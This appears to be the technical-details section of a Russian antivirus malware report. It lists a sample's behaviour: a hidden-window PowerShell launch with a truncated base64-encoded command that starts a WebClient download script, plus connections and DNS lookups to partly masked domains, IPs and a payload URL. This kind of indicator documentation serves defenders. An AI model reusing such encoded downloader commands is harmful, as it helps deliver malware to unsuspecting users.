Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAF8ANgAwADAANAA5AF8APQAoACcAcgA5ADgAJwArACcANwBfAF8AXwAnACkAOwAkAEkAXwA0ADIAMwA3ADMAOQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB1ADYANAA4ADkAXwA9ACgAJwBoAH...
- 'te####villas.com':80
- 'te####villas.com':443
- '19#.#8.208.202':80
- '13#.#97.72.9':80
- '13.##6.61.11':80
- http://te####villas.com/l2BOnRc5q_pGXL6RE
- 'te####villas.com':443
- DNS ASK te####villas.com
- DNS ASK ma#####lylive.com.au
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAF8ANgAwADAANAA5AF8APQAoACcAcgA5ADgAJwArACcANwBfAF8AXwAnACkAOwAkAEkAXwA0ADIAMwA3ADMAOQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB1ADYANAA4ADkAXwA9ACgAJwBoAH...' (со скрытым окном)